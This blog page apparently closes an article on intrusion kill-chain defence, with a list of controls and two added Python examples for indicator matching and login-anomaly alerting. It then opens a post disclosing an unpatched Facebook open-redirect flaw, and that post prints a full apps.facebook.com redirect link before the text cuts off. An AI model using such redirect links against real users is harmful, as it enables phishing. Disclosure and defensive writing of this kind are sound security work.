recognize those previously used tactics and exploits in current attacks. For example, mapping of three intrusions
revealed that all three were delivered via email, all three used very similar encryption,
all three used the same installation program, and all three connected to the same outside
collection site. All of the intrusions were stopped before they accomplished
their objective.</div>
</div>
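<div style="text-align: justify;">
The comparison described above, as an added example that is not from the original article or from Lockheed Martin: mapped intrusions are indexed by kill chain phase so that indicators shared across intrusions stand out, and a new intrusion is matched at the earliest phase where a known indicator appears. The intrusion records, indicator labels and function names are constructed for illustration.</div>

```python
from collections import defaultdict

# The seven links of the intrusion kill chain, in order.
PHASES = [
    "Reconnaissance", "Weaponization", "Delivery", "Exploitation",
    "Installation", "Command and Control", "Actions on Objective",
]

# Constructed sample data: three mapped intrusions. All labels are placeholders,
# and filing the encryption trait under Weaponization is an assumption.
INTRUSIONS = {
    "intrusion-1": {
        "Weaponization": {"cipher:family-A", "lure:pdf"},
        "Delivery": {"channel:email"},
        "Installation": {"installer:placeholder-X"},
        "Command and Control": {"c2:collector.example.invalid"},
    },
    "intrusion-2": {
        "Weaponization": {"cipher:family-A", "lure:doc"},
        "Delivery": {"channel:email"},
        "Installation": {"installer:placeholder-X"},
        "Command and Control": {"c2:collector.example.invalid"},
    },
    "intrusion-3": {
        "Weaponization": {"cipher:family-A", "lure:pdf"},
        "Delivery": {"channel:email"},
        "Installation": {"installer:placeholder-X"},
        "Command and Control": {"c2:collector.example.invalid"},
    },
}


def build_compendium(intrusions):
    """Index every indicator as {(phase, indicator): sorted intrusion ids}."""
    index = defaultdict(set)
    for name, phases in intrusions.items():
        for phase, indicators in phases.items():
            if phase not in PHASES:
                raise ValueError(f"unknown phase {phase!r} in {name}")
            for indicator in indicators:
                index[(phase, indicator)].add(name)
    return {key: sorted(names) for key, names in index.items()}


def shared_indicators(compendium, minimum=2):
    """Indicators seen in at least `minimum` intrusions, in kill chain order."""
    hits = [
        (phase, indicator, names)
        for (phase, indicator), names in compendium.items()
        if len(names) >= minimum
    ]
    return sorted(hits, key=lambda hit: (PHASES.index(hit[0]), hit[1]))


def earliest_match(observed, compendium):
    """Earliest phase at which a new intrusion reuses a known indicator.

    Returns (phase, indicator, prior intrusion ids), or None when nothing in
    the compendium matches. The earlier the phase, the earlier the chain can
    be broken.
    """
    for phase in PHASES:
        for indicator in sorted(observed.get(phase, ())):
            prior = compendium.get((phase, indicator))
            if prior:
                return phase, indicator, prior
    return None


if __name__ == "__main__":
    compendium = build_compendium(INTRUSIONS)
    for phase, indicator, seen_in in shared_indicators(compendium, minimum=3):
        print(f"{phase:20} {indicator:32} {', '.join(seen_in)}")
    # A new, partially observed intrusion (constructed): different delivery
    # channel, but the same installation program as before.
    new_event = {
        "Delivery": {"channel:usb"},
        "Installation": {"installer:placeholder-X"},
    }
    print(earliest_match(new_event, compendium))
```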
<div class="MsoBodyText" style="margin-bottom: 5.75pt; margin-left: 0in; margin-right: 0in; margin-top: 5.75pt;">
<div style="text-align: justify;">
How did they do this? How can my company utilize this
approach?</div>
</div>
<div class="MsoBodyText" style="margin-bottom: 5.75pt; margin-left: 0in; margin-right: 0in; margin-top: 5.75pt;">
<div style="text-align: justify;">
Monitoring and mapping are the key.</div>
</div>
<div class="MsoBodyText" style="margin-bottom: 5.75pt; margin-left: 0in; margin-right: 0in; margin-top: 5.75pt;">
<div style="text-align: justify;">
The following list contains some of the necessary
components (not in any particular order) needed to map intrusions and
set up the kill.</div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt; mso-list: l0 level1 lfo1; tab-stops: list .5in; text-indent: -.25in;">
<div style="text-align: justify;">
<span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">
</span></span><!--[endif]-->Network Intrusion Detection (NIDS)<o:p></o:p></div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt; mso-list: l0 level1 lfo1; tab-stops: list .5in; text-indent: -.25in;">
<div style="text-align: justify;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">
</span></span><!--[endif]-->Network Intrusion Prevention (NIPS)<o:p></o:p></div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt; mso-list: l0 level1 lfo1; tab-stops: list .5in; text-indent: -.25in;">
<div style="text-align: justify;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">
</span></span><!--[endif]-->Host Intrusion Detection (HIDS)<o:p></o:p></div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt; mso-list: l0 level1 lfo1; tab-stops: list .5in; text-indent: -.25in;">
<div style="text-align: justify;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">
</span></span><!--[endif]-->Firewall access control lists (ACL)<o:p></o:p></div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt; mso-list: l0 level1 lfo1; tab-stops: list .5in; text-indent: -.25in;">
<div style="text-align: justify;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">
</span></span><!--[endif]-->Full packet inspection<o:p></o:p></div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt; mso-list: l0 level1 lfo1; tab-stops: list .5in; text-indent: -.25in;">
<div style="text-align: justify;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">
</span></span><!--[endif]-->A mature IT asset management system<o:p></o:p></div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt; mso-list: l0 level1 lfo1; tab-stops: list .5in; text-indent: -.25in;">
<div style="text-align: justify;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">
</span></span><!--[endif]-->A mature and comprehensive Configuration
Management Database (CMDB)<o:p></o:p></div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt; mso-list: l0 level1 lfo1; tab-stops: list .5in; text-indent: -.25in;">
<div style="text-align: justify;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">
</span></span><!--[endif]-->Device and system hardening<o:p></o:p></div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt; mso-list: l0 level1 lfo1; tab-stops: list .5in; text-indent: -.25in;">
<div style="text-align: justify;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">
</span></span><!--[endif]-->Secure configuration baselines<o:p></o:p></div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt; mso-list: l0 level1 lfo1; tab-stops: list .5in; text-indent: -.25in;">
<div style="text-align: justify;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">
</span></span><!--[endif]-->Website inspection<o:p></o:p></div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt; mso-list: l0 level1 lfo1; tab-stops: list .5in; text-indent: -.25in;">
<div style="text-align: justify;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">
</span></span><!--[endif]-->Honeypots<o:p></o:p></div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt; mso-list: l0 level1 lfo1; tab-stops: list .5in; text-indent: -.25in;">
<div style="text-align: justify;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">
</span></span><!--[endif]-->Anti-virus and anti-malware<o:p></o:p></div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt; mso-list: l0 level1 lfo1; tab-stops: list .5in; text-indent: -.25in;">
<div style="text-align: justify;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">
</span></span><!--[endif]-->Verbose logging – network devices, servers,
databases, and applications<o:p></o:p></div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt; mso-list: l0 level1 lfo1; tab-stops: list .5in; text-indent: -.25in;">
<div style="text-align: justify;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">
</span></span><!--[endif]-->Log correlation<o:p></o:p></div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt; mso-list: l0 level1 lfo1; tab-stops: list .5in; text-indent: -.25in;">
<div style="text-align: justify;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">
</span></span><!--[endif]-->Alerting<o:p></o:p></div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt; mso-list: l0 level1 lfo1; tab-stops: list .5in; text-indent: -.25in;">
<div style="text-align: justify;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">
</span></span><!--[endif]-->Patching<o:p></o:p></div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt; mso-list: l0 level1 lfo1; tab-stops: list .5in; text-indent: -.25in;">
<div style="text-align: justify;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">
</span></span><!--[endif]-->Email and FTP inspection and filtering<o:p></o:p></div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt; mso-list: l0 level1 lfo1; tab-stops: list .5in; text-indent: -.25in;">
<div style="text-align: justify;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">
</span></span><!--[endif]-->Network tracing tools<o:p></o:p></div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt; mso-list: l0 level1 lfo1; tab-stops: list .5in; text-indent: -.25in;">
<div style="text-align: justify;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">
</span></span><!--[endif]-->Information Security staff trained in tracking
and mapping events end-to-end<o:p></o:p></div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt; mso-list: l0 level1 lfo1; tab-stops: list .5in; text-indent: -.25in;">
<div style="text-align: justify;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">
</span></span><!--[endif]-->Coordination and partnering with IT, Application
Owners, Database Administrators, Business Units and Management both in
investigation and communicating the mapped intrusions.<o:p></o:p></div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt;">
<div style="text-align: justify;">
<br /></div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: 0in; margin-right: 0in; margin-top: 2.9pt;">
<div style="text-align: justify;">
In short, to implement intrusion kill chain
activity, a company needs a mature, inter-operating information security
program. Additionally, it needs trained staff who can investigate, map and
advise on 'kill' activities, keep a compendium of mapped intrusions, and analyze and
compare old and new intruder activity, code use, and delivery methods to thwart
current and future intrusions.</div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: 0in; margin-right: 0in; margin-top: 2.9pt;">
<div style="text-align: justify;">
The intrusion (cyber) kill chain is not an endeavor that
can be successfully implemented in place of a comprehensive Information
Security Program; it is another tool to be used to protect the company's data
assets.</div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: 0in; margin-right: 0in; margin-top: 2.9pt;">
<div style="text-align: justify;">
The good news is that if your company doesn't have a mature
information security program, there is a lot you can do while making plans to
introduce intrusion kill chains into your department's arsenal.</div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt; mso-list: l1 level1 lfo2; tab-stops: list .5in; text-indent: -.25in;">
<div style="text-align: justify;">
<span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">
</span></span><!--[endif]-->Educate your employees to watch for suspicious
emails, for instance emails that seem to be off, such as someone in
accounting receiving an invitation to attend a marketing conference. Let them
know that they shouldn't open attachments included in emails like this.</div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt; mso-list: l1 level1 lfo2; tab-stops: list .5in; text-indent: -.25in;">
<div style="text-align: justify;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">
</span></span><!--[endif]-->Make sure you have anti-virus and anti-malware software
installed and up to date.<o:p></o:p></div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt; mso-list: l1 level1 lfo2; tab-stops: list .5in; text-indent: -.25in;">
<div style="text-align: justify;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">
</span></span><!--[endif]-->Start an inventory of your computing devices,
laptops, desktops, tablets, smartphones, network devices and security devices.<o:p></o:p></div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt; mso-list: l1 level1 lfo2; tab-stops: list .5in; text-indent: -.25in;">
<div style="text-align: justify;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">
</span></span><!--[endif]-->You have an advantage over intruders: you know
your network and what is normal and usual; they don't. Notice user behavior that is not usual and
look into it, for example a login at 2am
for someone who works 9 to 5, or an application process that normally runs
overnight kicking off during the day.</div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt; mso-list: l1 level1 lfo2; tab-stops: list .5in; text-indent: -.25in;">
<div style="text-align: justify;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">
</span></span><!--[endif]-->Keep your security patches up to date.<o:p></o:p></div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt; mso-list: l1 level1 lfo2; tab-stops: list .5in; text-indent: -.25in;">
<div style="text-align: justify;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">
</span></span><!--[endif]-->Create and monitor baseline configurations.<o:p></o:p></div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt; mso-list: l1 level1 lfo2; tab-stops: list .5in; text-indent: -.25in;">
<div style="text-align: justify;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">
</span></span><!--[endif]-->Write, publish and communicate information
security policies and company standards.<o:p></o:p></div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt; mso-list: l1 level1 lfo2; tab-stops: list .5in; text-indent: -.25in;">
<div style="text-align: justify;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">
</span></span><!--[endif]-->Turn on logging and start collecting and keeping
logs. Start with network devices and firewalls and then add servers and
databases. Set up alerts for things such
as repeated attempts at access.<o:p></o:p></div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt; mso-list: l1 level1 lfo2; tab-stops: list .5in; text-indent: -.25in;">
<div style="text-align: justify;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">
</span></span><!--[endif]-->Spend some time using search engines from
outside your network to see how much information can be learned about your
company from the Internet. You'd be
surprised how much you can find including sensitive documents.<o:p></o:p></div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt;">
<div style="text-align: justify;">
<br /></div>
</div>
<div style="text-align: justify;">
All of these practices and activities give you more
information about your computing environment and what is normal and usual. The
more you know about your environment, the more likely it is that you will spot
the intruder before any damage is done.</div>
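<div style="text-align: justify;">
Two of the checks suggested in the list above (a login at 2am for someone who works 9 to 5, and alerts for repeated attempts at access), as an added example that is not part of the original article. The log format, account names, working-hours baseline and thresholds are constructed for illustration.</div>

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log; the format and every value are made up for this example.
LOG_LINES = """\
2014-02-03T09:12:40 login user=alice result=success src=10.0.0.21
2014-02-04T02:07:11 login user=alice result=success src=10.0.0.21
2014-02-04T01:30:00 login user=backup-svc result=success src=10.0.0.9
2014-02-04T14:02:00 login user=backup-svc result=success src=10.0.0.9
2014-02-04T11:00:01 login user=bob result=failure src=192.0.2.44
2014-02-04T11:00:09 login user=bob result=failure src=192.0.2.44
2014-02-04T11:00:15 login user=bob result=failure src=192.0.2.44
2014-02-04T11:00:22 login user=bob result=failure src=192.0.2.44
2014-02-04T11:00:30 login user=bob result=failure src=192.0.2.44
2014-02-04T11:05:00 login user=bob result=success src=10.0.0.22
this line is malformed and is skipped
""".splitlines()

LINE_RE = re.compile(
    r"^(?P<ts>\S+) login user=(?P<user>\S+) "
    r"result=(?P<result>success|failure) src=(?P<src>\S+)$"
)

# Baseline of what is "normal and usual": [start hour, end hour) per account.
WORK_HOURS = {"alice": (9, 17), "bob": (9, 17), "backup-svc": (0, 5)}


def parse(lines):
    """Return time-ordered (timestamp, user, result, src) tuples."""
    events = []
    for line in lines:
        match = LINE_RE.match(line.strip())
        if not match:
            continue  # not a login record
        try:
            ts = datetime.fromisoformat(match["ts"])
        except ValueError:
            continue  # unparseable timestamp
        events.append((ts, match["user"], match["result"], match["src"]))
    return sorted(events)


def off_hours_logins(events, work_hours):
    """Successful logins that fall outside the account's usual hours."""
    alerts = []
    for ts, user, result, _src in events:
        hours = work_hours.get(user)
        if result != "success" or hours is None:
            continue  # failures are handled below; no baseline recorded
        start, end = hours
        if not (start <= ts.hour < end):
            alerts.append((ts, user))
    return alerts


def repeated_failures(events, threshold=5, window=timedelta(minutes=10)):
    """Alert once when a (user, src) pair reaches `threshold` failures in `window`."""
    recent = defaultdict(deque)
    alerts = []
    for ts, user, result, src in events:
        if result != "failure":
            continue
        attempts = recent[(user, src)]
        attempts.append(ts)
        while ts - attempts[0] > window:
            attempts.popleft()  # drop attempts that aged out of the window
        if len(attempts) == threshold:
            alerts.append((ts, user, src))
    return alerts


if __name__ == "__main__":
    events = parse(LOG_LINES)
    for ts, user in off_hours_logins(events, WORK_HOURS):
        print(f"off-hours login: {user} at {ts.isoformat()}")
    for ts, user, src in repeated_failures(events):
        print(f"repeated failures: {user} from {src} at {ts.isoformat()}")
```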
<br />
<div style="text-align: justify;">
<b><u>Disclaimer:-</u> </b>Before concluding, on behalf of <b><a href="http://www.voiceofgreyhat.com/">Team VOGH</a></b>, I would like to personally thank <b>Mr. </b><span style="text-align: center;"><b>Adrian Stolarski</b> for sharing this remarkable article with our readers. I would also like to thank </span><b>Ryan Fahey</b> <span style="text-align: center;"> of <b><a href="http://infosecinstitute.com/">Infosec Institute</a></b> for his spontaneous effort. </span></div>
</div>
Avik Sarkarhttp://www.blogger.com/profile/15506950346762737730noreply@blogger.comtag:blogger.com,1999:blog-3968483416361429386.post-1196866808705258102014-01-02T23:10:00.000+05:302014-02-10T01:48:47.721+05:30VOGH Exclusive: URL Redirection Vulnerability Found In Facebook <div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
<div style="text-align: center;">
<span style="font-size: large;"><b>VOGH Exclusive:</b> <b><span style="color: red;">URL Redirection Vulnerability</span></b> Found In <b><span style="color: blue;">Facebook</span></b> [The Vulnerability Still Active & Not Been Patched]</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtnVSE0uRdUkBn5GBqgCcYgBJwFOjEFbz63GOUHWDJ9ilEwGx1CGN_xpsHBnxxxm0uf2TfnfHTzgogqzV04xw-LPMuLArFhrahfTd2pHwNb6og26DD6IbhVQkPwa0N3d9bcewkg7AsFUM/s1600/url-redirection-vulnerability-in-facebook.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtnVSE0uRdUkBn5GBqgCcYgBJwFOjEFbz63GOUHWDJ9ilEwGx1CGN_xpsHBnxxxm0uf2TfnfHTzgogqzV04xw-LPMuLArFhrahfTd2pHwNb6og26DD6IbhVQkPwa0N3d9bcewkg7AsFUM/s400/url-redirection-vulnerability-in-facebook.jpg" height="275" width="600" /></a></div>
<a href="http://www.voiceofgreyhat.com/search?q=Facebook">Facebook</a>, the world's largest <a href="http://www.voiceofgreyhat.com/search?q=social+networking">social networking</a> site with more than one billion registered users, is considered one of the safest sites in <a href="http://www.voiceofgreyhat.com/search?q=cyber+space">cyber space</a>. To maintain that reputation, Facebook Inc. has taken every step it possibly could. Like other high-profile and very popular websites, Facebook is also a prime target for almost every <a href="http://www.voiceofgreyhat.com/search?q=cyber+criminal">cyber criminal</a> in the world. To counter this and keep FB safe and secure, the company introduced what it calls a <a href="http://www.voiceofgreyhat.com/2011/07/facebook-launches-security-bug-bounty.html">'Bug Bounty'</a> offer, where you can submit <a href="http://www.voiceofgreyhat.com/search/label/vulnerablity">vulnerabilities</a> to FB and <a href="http://www.voiceofgreyhat.com/2012/05/facebook-said-please-hack-us-get-bounty.html">get rewarded</a>. We have seen many <a href="http://www.voiceofgreyhat.com/search?q=security+researchers">security researchers</a> and <a href="http://www.voiceofgreyhat.com/search?q=hackers">hackers</a> across the globe do this and receive their reward. But not every time, and that is what I will talk about today. A few days ago a reader of <a href="http://www.voiceofgreyhat.com/">VOGH</a>, who goes by the nickname <a href="http://www.voiceofgreyhat.com/search?q=Dr41DeY">'Dr41DeY'</a>, figured out a <b><span style="color: red;">URL redirection vulnerability</span></b> in <b>Facebook</b>. One of the links in the Facebook App domain, <b>apps.facebook.com</b>, exposes a URL redirection vulnerability.
The hacker has <a href="http://www.youtube.com/watch?v=I3H12oL08bk&feature=youtu.be">demonstrated</a> how anyone can use the <a href="http://www.voiceofgreyhat.com/search/label/vulnerablity">vulnerability</a> to manipulate millions of innocent Facebook users. Let's see: </div>
<span class="embed-youtube" style="display: block; text-align: center;"><iframe class="youtube-player" frameborder="0" height="359" src="http://www.youtube.com/embed/I3H12oL08bk?version=3&rel=1&fs=1&showsearch=0&showinfo=1&iv_load_policy=1&wmode=transparent" type="text/html" width="584"></iframe></span><br />
<div style="text-align: justify;">
Before publishing this, one of our VOGH representatives talked with<a href="http://www.facebook.com/whitehat"> Facebook Security</a> about this <a href="http://www.voiceofgreyhat.com/search?q=security+vulnerability">security vulnerability</a>, but for some reason FB may have overlooked the issue. Finally, after waiting for almost a week, we, <b><a href="http://www.voiceofgreyhat.com/">Team VOGH</a></b>, decided to bring this in front of our readers. Let's briefly go through the vulnerable link: </div>
<br />
<a href="https://apps.facebook.com/a.php?u=http://www.voiceofgreyhat.com&mac=AQLy7nyXi5NBt31j&__tn__=*B&eid=AQLpbizR7KEf3cyD0VTN7fNtv99fMZABDp2gdWhvL-MQocJIPy3w4hUG7_7hrmSMqDq7QLCI9k_0LbB95NEz_6GUDHGNgTDsGP_rX-VWRHxfg5a--VlnN1K9FdG3NAek8r2JPWENkb2Mu56EckbZCGXcPie27OnHxE-H7MBufQel0Pr-ZjpCWB6QF5xHeWsdKqyHzjK2woBGGrjk9Dlgnzcw3d9ZWPzrwbGpm6MSkpks3mqEphXnTP2Vd9UDQxIs68NnTaO35XIwKq5t3CSdb11iU_34gzjfLgvvDo_BYbgtrGe0Juc5CpRSwd5nImw9oPPvn6Za9rrxO_ivROtOGc2b2S3bYzNLWpbDwt3cFN2rJ3JElyIR0vjB4R859PpE9SrZx6AD3s_liikzPh30YLVb8XvPABk7r9MShk6OrVFPiAWZnEvPx49UzPDSF-nEl188rEPAi0KGJ4u1zb10hhzmHUCjH04SezDByUkyNituMb2lgiQz-Xlpgy_tkVYR-U7plDa38N9VzdAj_Bwefd7B85ykZCAy9ZQOt48Ql8KQeKfivk3sThZIkLwWPiju7R28Sw6bj09vS_Y28kFSqanGe9tYAPfKIe4zOzQt9-Q1CC_EwX3ypOlyQ2yXMiU3lwp7M9EriKHRFDsTgsuzzF-uvlpx3UrWh8M55-NX0ULjr4kxjAR5g_1wU-luUyn_Ot6Ly1_ZbBdahyb5uSmCDNvF5kMuIH8Gxvpql45dNffGzKau9oZGn6r1OmsG47JIGipznCVaZnWjXAakDnEMX6X8ZtI-M-db1olzbBpJdj5sZe-x2VM02S5XsXJWe_QLxFDOupjbz8I82HETHQ9PbzSIMsJboll4E3-f_JQFfdzwEguLa8SC_ImRahWBCwKNJeSlmRv91FqWpQaChe5-UyAoqcblvK4jPuRO3qC7o-qMTQ2jEJqqUW46koulOmgNJpMYXPgRxjNGcwjyTPS59Nr08zq6eCNd1aYLh2E4s5MYXBtVUTF8l0uhQ2wYSoR66xZsI2tK0DD1KiQHyTO1QieBwPtCN3eWgRzUTg3lM3ttkuwYKRPPLDvtUOPWmZhYUzUFcbfPM2kXdpqyGlrGx9-ErKGygYKATx2xzrTzktjgW4q0L5wfO3CSKAOCAoKfi_pfz-zIHSNE8ZAjZDtpbC_chgkvbHWJYYIs7pnE1riWJYORACjkkRr6nZoivC3z_g-8JBahghwy2C34kJYZJ6cBC8LKoB6KCTbj_F1tArQAzcSUij4vrJNUATzsdlO_ol6HwUQb8FjoWa38Bhtx81stxB328sgC9IGu1omPG0QeNJVhcJwh6HyEwtgycBLrlcdedaWbkwvnjv3F3BWuJIi763nBeYuAgNUaEUYHaXu_ZJzXW8fQ72nz_hddGT_GH50&sig=89099">https://apps.facebook.com/a.php?u=<b><span style="color: 
